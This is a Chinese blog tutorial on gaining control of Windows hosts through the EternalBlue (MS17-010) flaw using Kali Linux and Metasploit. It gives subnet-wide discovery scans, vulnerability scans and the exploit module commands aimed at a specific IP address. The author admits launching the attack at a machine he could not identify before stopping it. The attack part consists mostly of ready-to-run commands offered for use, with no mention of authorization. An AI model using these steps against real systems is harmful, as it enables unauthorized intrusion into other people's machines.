kali利用永恒之蓝获取主机权限

2019-05-16  本文已影响0人  migrate_
  1. 编辑kali的源为国内源
    1.#阿里云Kali源
    2.deb http://mirrors.aliyun.com/kali kali main non-free contrib 
    3.deb-src http://mirrors.aliyun.com/kali kali main non-free contrib 
    4.deb http://mirrors.aliyun.com/kali-security kali/updates main contrib non-free
  1. 更新应用
apt-get update && apt-get upgrade && apt-get dist-upgrade
  1. 更新系统内核
apt-get install linux-headers-$(uname -r)
  1. 如果报错可以试试这个
aptitude -r install linux-headers-$(uname -r
  1. 主机存活检测
# fping 工具 kali自带
fping -asg 192.168.1.0/24
1.jpg
# nbtscan工具 kali自带
nbtscan -r 192.168.1.0/24
2.jpg
# nmap ping 包扫描
nmap -n -sS 192.168.1.0/24
# 指定端口发现扫描
nmap -n -p445 192.168.1.0/24 --open
# 针对漏洞脚本的定向扫描
nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open
# 个人推荐使用 nmap -n -p445 192.168.1.0/24 --open 其扫描发现的效率最高。
3.jpg
  1. MSF Auxiliary 辅助扫描
msfconsole # 进入MSF框架 
version # 确认下MSF的版本 
search ms17_010 # 查找漏洞模块的具体路径 
use auxiliary/scanner/smb/smb_ms17_010 # 调用漏洞扫描模块 
show options # 查看模块配置选项 
set RHOST 192.168.1.1-254 # 配置扫描目标 
set THREADS 30 #配置扫描线程 
run #运行脚本
  1. 这个使用下来,我们发现其实还没有namp 一条命令就搞定了,来的方便。
  2. 上边的都是为了扫描开放端口的主机,接下来利用漏洞获取权限
ms17-010 漏洞利用之MSF使用方法
msfconsole # 进入MSF 框架 
version # 确保MSF框架版本在 4.14.17以上; 
search ms17_010 # 漏洞模块路径查询 
use exploit/windows/smb/ms17_010_eternalblue # 调用攻击模块
set RHOST 192.168.1.112 # 设定攻击目标 
exploit # 发起攻击
  1. 查找漏洞模块路径


    4.jpg
  2. 调用和配置exploit攻击参数


    5.jpg
  3. 设置工具目标


    6.jpg
  4. 发起攻击 exploit 或者 run


    7.jpg
  5. 我手动终止了,不知道这是什么机器,不乱搞了,如果成功会直接返回会话(看各位的运气了!)
上一篇下一篇

猜你喜欢

热点阅读